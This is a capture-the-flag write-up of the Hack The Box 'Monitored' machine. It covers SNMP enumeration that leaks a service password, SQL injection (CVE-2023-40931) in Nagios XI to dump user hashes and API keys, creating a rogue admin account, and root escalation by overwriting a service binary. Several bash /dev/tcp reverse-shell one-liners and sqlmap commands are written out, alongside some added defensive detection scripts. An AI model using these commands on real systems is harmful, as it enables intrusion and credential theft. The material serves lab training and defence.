HTB-Monitored(Medium)

admin, 2024-01-21 15:04:12

Key points: SNMP enumeration on UDP port 161; Nagios XI CVEs (SQL injection and authenticated RCE from the admin back end); a privilege-escalation bug in a service script that re-executes a file the service account owns.


Scan

┌──(kali㉿kali)-[~/Desktop/htb/Monitored]
└─$ sudo nmap -sC -sV -sU -T4 -Pn 10.10.11.248
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-20 09:06 EST
Warning: 10.10.11.248 giving up on port because retransmission cap hit (6).
Stats: 0:14:09 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 81.30% done; ETC: 09:23 (0:03:15 remaining)
Stats: 0:32:11 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.91% done; ETC: 09:38 (0:00:01 remaining)
Stats: 0:32:16 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.91% done; ETC: 09:38 (0:00:01 remaining)
Nmap scan report for nagios.monitored.htb (10.10.11.248)
Host is up (0.39s latency).
Not shown: 992 closed udp ports (port-unreach)
PORT      STATE         SERVICE VERSION
68/udp    open|filtered dhcpc
123/udp   open          ntp     NTP v4 (unsynchronized)
| ntp-info: 
|_  
161/udp   open          snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-interfaces: 
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Traffic stats: 522.86 Kb sent, 522.86 Kb received
|   VMware VMXNET3 Ethernet Controller
|     IP address: 10.10.11.248  Netmask: 255.255.254.0
|     MAC address: 00:50:56:b9:64:03 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|_    Traffic stats: 76.39 Mb sent, 51.24 Mb received
| snmp-netstat: 
|   TCP  0.0.0.0:22           0.0.0.0:0
|   TCP  0.0.0.0:389          0.0.0.0:0
|   TCP  10.10.11.248:46074   10.10.16.48:7777
|   TCP  10.10.11.248:49754   10.10.14.146:4444
|   TCP  127.0.0.1:25         0.0.0.0:0
|   TCP  127.0.0.1:3306       0.0.0.0:0
|   TCP  127.0.0.1:5432       0.0.0.0:0
|   TCP  127.0.0.1:7878       0.0.0.0:0
|   TCP  127.0.0.1:41018      127.0.1.1:80
|   TCP  127.0.0.1:41028      127.0.1.1:80
|   UDP  0.0.0.0:68           *:*
|   UDP  0.0.0.0:123          *:*
|   UDP  0.0.0.0:161          *:*
|   UDP  0.0.0.0:162          *:*
|   UDP  10.10.11.248:123     *:*
|_  UDP  127.0.0.1:123        *:*
| snmp-processes: 
|   1: 
|     Name: systemd
|     Path: /sbin/init
|   [kernel threads with PIDs 2-285 (kthreadd, rcu_*, kworker/*, irq/*, scsi_*, ...) omitted here]
|   323: 
|     Name: systemd-journal
|     Path: /lib/systemd/systemd-journald
|   346: 
|     Name: systemd-udevd
|     Path: /lib/systemd/systemd-udevd
|   391: 
|     Name: irq/16-vmwgfx
|   393: 
|     Name: ttm_swap
|   394: 
|     Name: cryptd
|   395: 
|     Name: card0-crtc0
|   398: 
|     Name: card0-crtc1
|   399: 
|     Name: card0-crtc2
|   401: 
|     Name: card0-crtc3
|   403: 
|     Name: card0-crtc4
|   405: 
|     Name: card0-crtc5
|   407: 
|     Name: card0-crtc6
|   409: 
|     Name: card0-crtc7
|   422: 
|     Name: VGAuthService
|     Path: /usr/bin/VGAuthService
|   424: 
|     Name: vmtoolsd
|     Path: /usr/bin/vmtoolsd
|   446: 
|     Name: auditd
|     Path: /sbin/auditd
|   458: 
|     Name: laurel
|     Path: /usr/local/sbin/laurel
|     Params: --config /etc/laurel/config.toml
|   463: 
|     Name: kworker/1:3-events
|   517: 
|     Name: audit_prune_tre
|   543: 
|     Name: hwmon1
|   551: 
|     Name: cron
|     Path: /usr/sbin/cron
|     Params: -f
|   552: 
|     Name: dbus-daemon
|     Path: /usr/bin/dbus-daemon
|     Params: --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
|   554: 
|     Name: rsyslogd
|     Path: /usr/sbin/rsyslogd
|     Params: -n -iNONE
|   556: 
|     Name: systemd-logind
|     Path: /lib/systemd/systemd-logind
|   558: 
|     Name: wpa_supplicant
|     Path: /sbin/wpa_supplicant
|     Params: -u -s -O /run/wpa_supplicant
|   561: 
|     Name: cron
|     Path: /usr/sbin/CRON
|     Params: -f
|   591: 
|     Name: sh
|     Path: /bin/sh
|     Params: -c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB 
|   646: 
|     Name: dhclient
|     Path: /sbin/dhclient
|     Params: -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
|   716: 
|     Name: avahi-autoipd
|     Path: avahi-autoipd: [eth0] sleeping
|   717: 
|     Name: avahi-autoipd
|     Path: avahi-autoipd: [eth0] callout dispatcher
|   768: 
|     Name: snmptrapd
|     Path: /usr/sbin/snmptrapd
|     Params: -LOw -f -p /run/snmptrapd.pid
|   788: 
|     Name: snmpd
|     Path: /usr/sbin/snmpd
|     Params: -LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid
|   791: 
|     Name: ntpd
|     Path: /usr/sbin/ntpd
|     Params: -p /var/run/ntpd.pid -g -u 108:116
|   800: 
|     Name: agetty
|     Path: /sbin/agetty
|     Params: -o -p -- u --noclear tty1 linux
|   806: 
|     Name: sshd
|     Path: sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
|   852: 
|     Name: shellinaboxd
|     Path: /usr/bin/shellinaboxd
|     Params: -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 7878 -u shellinabox -g shellinabox --user-css Black on Whit
|   855: 
|     Name: shellinaboxd
|     Path: /usr/bin/shellinaboxd
|     Params: -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 7878 -u shellinabox -g shellinabox --user-css Black on Whit
|   856: 
|     Name: slapd
|     Path: /usr/sbin/slapd
|     Params: -h ldap:/// ldapi:/// -g openldap -u openldap -F /etc/ldap/slapd.d
|   866: 
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   878: 
|     Name: postgres
|     Path: /usr/lib/postgresql/13/bin/postgres
|     Params: -D /var/lib/postgresql/13/main -c config_file=/etc/postgresql/13/main/postgresql.conf
|   901: 
|     Name: postgres
|     Path: postgres: 13/main: checkpointer 
|   902: 
|     Name: postgres
|     Path: postgres: 13/main: background writer 
|   903: 
|     Name: postgres
|     Path: postgres: 13/main: walwriter 
|   904: 
|     Name: postgres
|     Path: postgres: 13/main: autovacuum launcher 
|   905: 
|     Name: postgres
|     Path: postgres: 13/main: stats collector 
|   906: 
|     Name: postgres
|     Path: postgres: 13/main: logical replication launcher 
|   939: 
|     Name: mariadbd
|     Path: /usr/sbin/mariadbd
|   993: 
|     Name: snmptt
|     Path: /usr/bin/perl
|     Params: /usr/sbin/snmptt --daemon
|   995: 
|     Name: snmptt
|     Path: /usr/bin/perl
|     Params: /usr/sbin/snmptt --daemon
|   1033: 
|     Name: xinetd
|     Path: /usr/sbin/xinetd
|     Params: -pidfile /run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6
|   1552: 
|     Name: sudo
|     Path: sudo
|     Params: -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB
|   1553: 
|     Name: bash
|     Path: /bin/bash
|     Params: -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB
|   1596: 
|     Name: exim4
|     Path: /usr/sbin/exim4
|     Params: -bd -q30m
|   3687: 
|     Name: cron
|     Path: /usr/sbin/CRON
|     Params: -f
|   3688: 
|     Name: sh
|     Path: /bin/sh
|     Params: -c /usr/bin/php -q /usr/local/nagiosxi/cron/cmdsubsys.php >> /usr/local/nagiosxi/var/cmdsubsys.log 2>&1
|   3689: 
|     Name: php
|     Path: /usr/bin/php
|     Params: -q /usr/local/nagiosxi/cron/cmdsubsys.php
|   3694: 
|     Name: sh
|     Path: sh
|     Params: -c bash -c 'bash -i >& /dev/tcp/10.10.14.146/4444 0>&1'
|   3695: 
|     Name: bash
|     Path: bash
|     Params: -c bash -i >& /dev/tcp/10.10.14.146/4444 0>&1
|   3696: 
|     Name: bash
|     Path: bash
|     Params: -i
|   3718: 
|     Name: python3
|     Path: python3
|     Params: -c import pty; pty.spawn("/bin/bash")
|   3719: 
|     Name: bash
|     Path: /bin/bash
|   4135: 
|   4578: 
|     Name: kworker/0:1-cgroup_destroy
|   4767: 
|     Name: kworker/u4:0-flush-8:0
|   4982: 
|     Name: cron
|     Path: /usr/sbin/CRON
|     Params: -f
|   4983: 
|     Name: sh
|     Path: /bin/sh
|     Params: -c /usr/bin/php -q /usr/local/nagiosxi/cron/cmdsubsys.php >> /usr/local/nagiosxi/var/cmdsubsys.log 2>&1
|   4984: 
|     Name: php
|     Path: /usr/bin/php
|     Params: -q /usr/local/nagiosxi/cron/cmdsubsys.php
|   5094: 
|     Name: sh
|     Path: sh
|     Params: -c bash -c 'bash -i >&/dev/tcp/10.10.16.48/7777 0>&1'
|   5095: 
|     Name: bash
|     Path: bash
|     Params: -c bash -i >&/dev/tcp/10.10.16.48/7777 0>&1
|   5096: 
|     Name: bash
|     Path: bash
|     Params: -i
|   5232: 
|     Name: kworker/1:0-events
|   5312: 
|     Name: kworker/0:2-events
|   5316: 
|   5341: 
|   5346: 
|   5349: 
|   5352: 
|   5363: 
|     Name: apache2
|     Path: /usr/sbin/apache2
|   5364: 
|   5371: 
|     Name: apache2
|     Path: /usr/sbin/apache2
|   5373: 
|   5379: 
|   5380: 
|   5381: 
|   5383: 
|   5384: 
|   5385: 
|   5387: 
|   5396: 
|   5397: 
|     Name: cron
|   5398: 
|     Name: sh
|   5399: 
|     Name: php
|   5400: 
|   5401: 
|   5404: 
|     Name: sh
|   5405: 
|     Name: bash
|   5406: 
|     Name: bash
|   5408: 
|   5411: 
|   5412: 
|   5413: 
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|_  5414: 
| snmp-sysdescr: Linux monitored 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64
|_  System uptime: 31m38.33s (189833 timeticks)
| snmp-win32-software: 
|   (omitted)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 6f3fa7421af94c6500000000
|   snmpEngineBoots: 35
|_  snmpEngineTime: 31m38s
162/udp   open          snmp    net-snmp; net-snmp SNMPv3 server
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 5a44ab2146ff4c6500000000
|   snmpEngineBoots: 26
|_  snmpEngineTime: 31m38s
402/udp   open|filtered genie
17673/udp open|filtered unknown
18373/udp open|filtered unknown
29243/udp open|filtered unknown
Service Info: Host: monitored

Host script results:
|_clock-skew: 4s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2945.50 seconds

Enum

The scan shows LDAP on port 389, so query it with ldapsearch:

┌──(kali㉿kali)-[~/Desktop/htb/Monitored]
└─$ ldapsearch -x -H ldap://monitored.htb  -b "DC=monitored,DC=htb"
# extended LDIF
#
# LDAPv3
# base <DC=monitored,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# monitored.htb
dn: dc=monitored,dc=htb
objectClass: top
objectClass: dcObject
objectClass: organization
o: monitored.htb
dc: monitored

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

It returns basic information about the domain "monitored.htb" but nothing useful, so next look at port 161 with snmpwalk. Reference article:

https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp

snmpwalk -v2c -c public monitored.htb

In the walked process table the check_host.sh invocation (already visible in the nmap snmp-processes output) carries a username and password as command-line arguments: svc XjH7VCehowpR1xZB
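As an added defender-side check (not part of the original writeup), the script below parses the HOST-RESOURCES-MIB hrSWRun rows that snmpwalk returns and flags processes whose argv carries a credential, which is exactly how the svc password above becomes readable by anyone holding the public community string. The sample rows are constructed from the nmap process list; the `MIB::name.pid = STRING: "..."` line shape is the standard net-snmp output format and is assumed here.

```python
import re
from collections import defaultdict

# Constructed sample: hrSWRun rows in snmpwalk's output format, modelled on
# the nmap snmp-processes results above (PIDs 591, 788 and 1553).
SAMPLE_WALK = """\
HOST-RESOURCES-MIB::hrSWRunName.591 = STRING: "sh"
HOST-RESOURCES-MIB::hrSWRunName.788 = STRING: "snmpd"
HOST-RESOURCES-MIB::hrSWRunName.1553 = STRING: "bash"
HOST-RESOURCES-MIB::hrSWRunPath.591 = STRING: "/bin/sh"
HOST-RESOURCES-MIB::hrSWRunPath.788 = STRING: "/usr/sbin/snmpd"
HOST-RESOURCES-MIB::hrSWRunPath.1553 = STRING: "/bin/bash"
HOST-RESOURCES-MIB::hrSWRunParameters.591 = STRING: "-c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB"
HOST-RESOURCES-MIB::hrSWRunParameters.788 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
HOST-RESOURCES-MIB::hrSWRunParameters.1553 = STRING: "-c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB"
"""

# One snmpwalk line: HOST-RESOURCES-MIB::hrSWRun<Field>.<pid> = STRING: "<value>"
LINE_RE = re.compile(r'^HOST-RESOURCES-MIB::hrSWRun(\w+)\.(\d+) = STRING: "(.*)"$')
# argv fragments that name a credential outright, e.g. password=... or --token ...
KEYWORD_RE = re.compile(r'(pass(word|wd)?|secret|token|api[_-]?key)\s*[=: ]', re.I)


def parse_hrswrun(text):
    """Group hrSWRunName/Path/Parameters rows by PID -> {pid: {field: value}}."""
    procs = defaultdict(dict)
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            field, pid, value = m.groups()
            procs[int(pid)][field] = value
    return dict(procs)


def looks_like_secret(token):
    """Heuristic for a password passed positionally: 12+ alphanumeric characters
    mixing lower, upper and digits, and not a flag, a path or a plain number."""
    if len(token) < 12 or token.startswith(('-', '/')) or not token.isalnum():
        return False
    classes = (any(c.islower() for c in token)
               + any(c.isupper() for c in token)
               + any(c.isdigit() for c in token))
    return classes == 3


def find_exposed_secrets(procs):
    """Return [(pid, name, reasons)] for processes whose argv appears to leak a secret."""
    findings = []
    for pid, info in sorted(procs.items()):
        params = info.get('Parameters', '')
        reasons = []
        if KEYWORD_RE.search(params):
            reasons.append('credential keyword in argv')
        for tok in params.split():
            if looks_like_secret(tok):
                # only the first four characters are reported, never the whole token
                reasons.append('high-entropy token %s...' % tok[:4])
                break
        if reasons:
            findings.append((pid, info.get('Name', '?'), reasons))
    return findings


if __name__ == '__main__':
    for pid, name, reasons in find_exposed_secrets(parse_hrswrun(SAMPLE_WALK)):
        print(f'PID {pid} ({name}): {"; ".join(reasons)}')
```

The fix on the host side is twofold: have check_host.sh read its credential from a root-readable file instead of argv, and restrict the snmpd read view so the process table is not served to the public community at all.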


Web

The user found above cannot log in to the web interface, so run a directory scan.

Besides the admin area there are API endpoints. Searching for documentation and CVEs turns up these forum posts:

https://support.nagios.com/forum/viewtopic.php?f=16&t=42923

https://support.nagios.com/forum/viewtopic.php?f=16&t=58783

Use the authentication API endpoint with those credentials to obtain a token:

┌──(root㉿kali)-[/home/kali/Desktop/htb/Monitored]
└─# curl -POST -k 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate' -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=500'
{"username":"svc","user_id":"2","auth_token":"37d33a2be847fa499528a908aa4d165cdf5f7fde","valid_min":500,"valid_until":"Sat, 20 Jan 2024 17:48:41 -0500"}

Searching shows the vulnerability is CVE-2023-40931: the id parameter of nagiosxi/admin/banner_message-ajaxhelper.php is SQL-injectable, so go straight to sqlmap:

sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=37d33a2be847fa499528a908aa4d165cdf5f7fde" --level 5 --risk 3 -p id --batch

Then enumerate the database, table and columns step by step and dump them (the token is fetched fresh on each run because it expires):

sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi -T xi_users --dump
Database: nagiosxi
Table: xi_users
[8 entries]
| user_id | email | name | api_key | enabled | password | username | created_by | last_login | api_enabled | last_edited | created_time | last_attempt | backend_ticket | last_edited_by | login_attempts | last_password_change |
| 1 | [email protected] | Nagios Administrator | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL | 1 | $2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C | nagiosadmin | 0 | 1701931372 | 1 | 1701427555 | 0 | 0 | IoAaeXNLvtDkH5PaGqV2XZ3vMZJLMDR0 | 5 | 0 | 1701427555 |
| 2 | [email protected] | svc | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK | 0 | $2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK | svc | 1 | 1699724476 | 1 | 1699728200 | 1699634403 | 1705760765 | 6oWBPbarHY4vejimmu3K8tpZBNrdHpDgdUEs5P2PFZYpXSuIdrRMYgk66A0cjNjq | 1 | 7 | 1699697433 |
| 6 | [email protected] | opcode | Ou33MAj0IfCIJg3iHOLY0rnKIgCj49loAL2RljN8neqORlheNJWYK0OiuqqhXO4f | 1 | $2a$10$b43fe283c318f646849d8uAujK14jfDD0xqBFR05Xt2lvX1al5m6u | opcode | 0 | 1705758991 | 0 | 0 | 0 | 0 | peJDmtr59inAnK3BYveojo8tAAVUY7pTNdQ7ghKLMd46eDYbksP2KfKtWi2jmUMg | 0 | 0 | 1705759009 |
| 7 | [email protected] | gage | 5HHXHqKnhAZTv4cmv8nALgZNrm59k8eVeE7M8j4NPH3eAFfVheYps3OTJKeci8GE | 1 | $2a$10$593e290d91b0b351ec413uLOXA7HHETzepbggKDRsCNlhkQ8/Fyu6 | caixukun | 0 | 1705759068 | 0 | 0 | 0 | 1705759323 | mlfjjUVpKgmYOKi2g7UHPf7NRse6cGtFeI4FKbusEAZiaTCDUdiPeWnYJEXJjua8 | 0 | 1 | 1705759127 |
| 8 | [email protected] | xyzxyz | 6lKRku0Nr54gZdLOgKUqGT5Mdb2Aj0pmsSu03AOO0VUqbroBMeqMYLR4kj6Hhoko | 1 | $2a$10$365df3d40687ff5fbc032uHet20Fjzb.vlnMuSgvoU2tFmzCMTUOq | xyzxyz | 0 | 1705759430 | 0 | 0 | 0 | 0 | JbdSTls6XhslQnirqE2KQtAPV9D92QIPuumiqBJhbJhakkWdjg8qH9H53TufqLuM | 0 | 0 | 1705759453 |
| 9 | [email protected] | admin | 4ErhsgfjJQCZJaE8lk0UsNTbcoOnQvAnBQGYfVIqq5jhbGmtqDcDfgC56oVLeFTA | 1 | $2a$10$47b968ae15ea823bd821buBL6rwR20PYKHUEB8/NAdbsAUDT.rVT2 | admin | 0 | 1705760553 | 0 | 0 | 0 | 0 | DHkQ9rfItbfuBAhErGcKkS5ebfuqcE9KsbPHPHdrch3ifOA2QTZbI56UNXv3pSvq | 0 | 0 | 1705760617 |
| 10 | admin111@localhost | Admin111 | ZLA8L2tecJNFm8BCuZhl9DrGoopfnLPkEYXLWFqIBdNFou5h7vcqnOvopDXaMpQt | 1 | $2a$10$e26442a9d958ed79c4dbfeMqqnMpqAqLoYEfuLZ6mHYFN1a7OLeMu | admin111 | 0 | 1705761352 | 0 | 0 | 0 | 0 | EtleX3SAUMa2e2IdKu2glhnXh93JtUvqr8K3UCYehJ3WvBgMhWkOBPOGub98FmdP | 0 | 0 | 1705761394 |
| 11 | [email protected] | geqian | XX0FrT4mKl0KcOIAAC6IilZCJkrqEkGag5rLIsUZ0YqSFC8LRDF8bP0qgRdPlQ5r | 1 | $2a$10$f5149f642d681ab41e09euzmac61tKRbKM4sVRlsLajUbJgvRDljG | geqian | 0 | 1705761542 | 0 | 0 | 0 | 0 | akv9G37D9PH4BZ4GnHG2FlVKo3oJF76La586sjZtqqWmDejvp2H4l7v0iUEHXrVq | 0 | 0 | 1705761615 |

[10:02:33] [INFO] table 'nagiosxi.xi_users' dumped to CSV file '/root/.local/share/sqlmap/output/nagios.monitored.htb/dump/nagiosxi/xi_users.csv'
[10:02:33] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/nagios.monitored.htb'
[*] ending @ 10:02:33 /2024-01-20/
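From the detection side, the sqlmap run above leaves a very distinctive trail in the Apache access log: hundreds of requests to banner_message-ajaxhelper.php whose id parameter is not a plain integer. This added example (not from the original writeup) parses combined-format log lines and reports those requests per client; the log lines are constructed to mirror the requests on this page, and the user-agent strings are made up.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines modelled on this writeup's traffic:
# one legitimate acknowledge call, two injection probes, one unrelated request.
SAMPLE_LOG = """\
10.10.14.64 - - [20/Jan/2024:09:58:01 -0500] "GET /nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=37d33a2be847fa499528a908aa4d165cdf5f7fde HTTP/1.1" 200 12 "-" "curl/8.5.0"
10.10.14.64 - - [20/Jan/2024:09:58:02 -0500] "GET /nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3%20AND%20SLEEP%285%29&token=37d33a2be847fa499528a908aa4d165cdf5f7fde HTTP/1.1" 200 12 "-" "sqlmap/1.7.12#stable"
10.10.14.64 - - [20/Jan/2024:09:58:09 -0500] "GET /nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3%27%20UNION%20ALL%20SELECT%20NULL--%20-&token=37d33a2be847fa499528a908aa4d165cdf5f7fde HTTP/1.1" 200 12 "-" "sqlmap/1.7.12#stable"
10.10.11.5 - - [20/Jan/2024:10:01:00 -0500] "GET /nagiosxi/index.php HTTP/1.1" 200 4301 "-" "Mozilla/5.0"
"""

# client, timestamp, request line and status from a combined-format entry
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
VULN_PATH = '/nagiosxi/admin/banner_message-ajaxhelper.php'


def parse_access_log(text):
    """Yield one dict per parseable log line."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def suspicious_id(value):
    """The endpoint expects a numeric banner id; anything else is a probe."""
    return not value.isdigit()


def find_injection_attempts(text):
    """Return [(ip, timestamp, decoded id value)] for every banner_message
    request whose id parameter is not a plain integer."""
    hits = []
    for rec in parse_access_log(text):
        parts = urlsplit(rec['target'])
        if parts.path != VULN_PATH:
            continue
        # parse_qs percent-decodes the values, so payloads are reported readably
        for value in parse_qs(parts.query).get('id', []):
            if suspicious_id(value):
                hits.append((rec['ip'], rec['ts'], value))
    return hits


def attempts_per_client(text):
    """Count probes per source address; sqlmap produces hundreds from one host."""
    return Counter(ip for ip, _, _ in find_injection_attempts(text))


if __name__ == '__main__':
    for ip, ts, value in find_injection_attempts(SAMPLE_LOG):
        print(f'{ts} {ip} id={value!r}')
    print(dict(attempts_per_client(SAMPLE_LOG)))
```

The same check translates directly into a WAF or mod_security rule on this path (id must match ^[0-9]+$), which blocks the probes until the patched Nagios XI release is installed.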

Then use curl to send a POST request to the Nagios XI API, with the nagiosadmin api_key from the dump, to create a new administrator account:

┌──(kali㉿kali)-[~/Desktop/htb/Monitored]
└─$ curl -POST -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=geqian&password=geqian&name=geqian&[email protected]&auth_level=admin"
{
    "success": "User account geqian was added successfully!",
    "user_id": 11
}

revshell

The account is added. Log in with it, open Core Config Manager and add a command:

bash -c 'bash -i >& /dev/tcp/10.10.14.64/4444 0>&1'

Then go to Monitoring > Services > Add New, attach that command to a new service, and save it.

After Run Command, the reverse shell connects back.


ROOT

nagios@monitored:~$ sudo -l
Matching Defaults entries for nagios on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User nagios may run the following commands on localhost:
    (root) NOPASSWD: /etc/init.d/nagios start
    (root) NOPASSWD: /etc/init.d/nagios stop
    (root) NOPASSWD: /etc/init.d/nagios restart
    (root) NOPASSWD: /etc/init.d/nagios reload
    (root) NOPASSWD: /etc/init.d/nagios status
    (root) NOPASSWD: /etc/init.d/nagios checkconfig
    (root) NOPASSWD: /etc/init.d/npcd start
    (root) NOPASSWD: /etc/init.d/npcd stop
    (root) NOPASSWD: /etc/init.d/npcd restart
    (root) NOPASSWD: /etc/init.d/npcd reload
    (root) NOPASSWD: /etc/init.d/npcd status
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php *
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/migrate/migrate.php *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *

Going into those directories and looking around shows that the script /usr/local/nagiosxi/scripts/manage_services.sh starts and stops services as root, and that the file /usr/local/nagios/bin/npcd it launches is owned by the user nagios. The binary's contents can therefore be replaced with reverse-shell code, and restarting the service runs it as root.

nagios@monitored:~$ rm /usr/local/nagios/bin/npcd
nagios@monitored:~$ vi /usr/local/nagios/bin/npcd
nagios@monitored:~$ chmod 777 /usr/local/nagios/bin/npcd
nagios@monitored:/usr/local/nagios/bin$ cat /usr/local/nagios/bin/npcd
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.64/5555 0>&1
nagios@monitored:/usr/local/nagios/bin$ sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
nagios@monitored:/usr/local/nagios/bin$ sudo /usr/local/nagiosxi/scripts/manage_services.sh restart np
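The root cause here is an ownership mismatch: a root-context sudo rule (manage_services.sh) re-executes a file that the unprivileged service account owns. This added audit helper, not part of the original writeup, encodes the check a hardening review would run over every such file and its parent directory (a writable directory lets the account rm and recreate the file, as was done above, even when the file itself is root-owned). The uid/gid 1001 for nagios and the directory mode are assumptions; the stat facts are constructed to mirror the finding on the page, and audit_executed_file() runs the same check against live paths.

```python
import os
import stat
from collections import namedtuple

FileFacts = namedtuple('FileFacts', 'path uid gid mode')

# Assumed ids for the nagios service account (not taken from the writeup).
NAGIOS_UID = 1001
NAGIOS_GIDS = {1001}


def replaceable_by(facts, uid, gids):
    """Reasons an unprivileged account (uid / gids) can alter the file that a
    root service script later executes. An empty list means it cannot."""
    reasons = []
    if facts.uid == uid and uid != 0:
        reasons.append('owned by the service account, not root')
    if facts.mode & stat.S_IWOTH:
        reasons.append('world-writable')
    elif facts.gid in gids and facts.mode & stat.S_IWGRP:
        reasons.append('group-writable by the service account')
    return reasons


def audit_facts(files, uid, gids):
    """Map path -> reasons for every file in `files` that fails the check."""
    findings = {}
    for f in files:
        r = replaceable_by(f, uid, gids)
        if r:
            findings[f.path] = r
    return findings


def audit_executed_file(path, uid, gids):
    """Live variant: stat the file and its directory and apply the same rules."""
    facts = []
    for p in (path, os.path.dirname(path)):
        st = os.stat(p)
        facts.append(FileFacts(p, st.st_uid, st.st_gid, st.st_mode))
    return audit_facts(facts, uid, gids)


# Constructed stat facts mirroring the state found on the box: npcd owned by
# nagios, its directory group-writable (assumed), manage_services.sh root-owned.
SAMPLE_FILES = [
    FileFacts('/usr/local/nagios/bin/npcd', NAGIOS_UID, NAGIOS_UID, stat.S_IFREG | 0o755),
    FileFacts('/usr/local/nagios/bin', 0, NAGIOS_UID, stat.S_IFDIR | 0o775),
    FileFacts('/usr/local/nagiosxi/scripts/manage_services.sh', 0, 0, stat.S_IFREG | 0o755),
]

if __name__ == '__main__':
    for path, reasons in audit_facts(SAMPLE_FILES, NAGIOS_UID, NAGIOS_GIDS).items():
        print(f'{path}: {"; ".join(reasons)}')
```

The remediation that follows from the finding is to make npcd (and its directory) root-owned and mode 755, so the NOPASSWD restart can no longer be turned into root code execution.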

Rooted.


Originally published by the WeChat public account 搁浅安全: HTB-Monitored(Medium)

Posted by admin on 2024-01-21 15:04:12. Please keep this link when reposting (CN-SEC 中文网, with thanks to the original author): https://cn-sec.com/archives/2415096.html
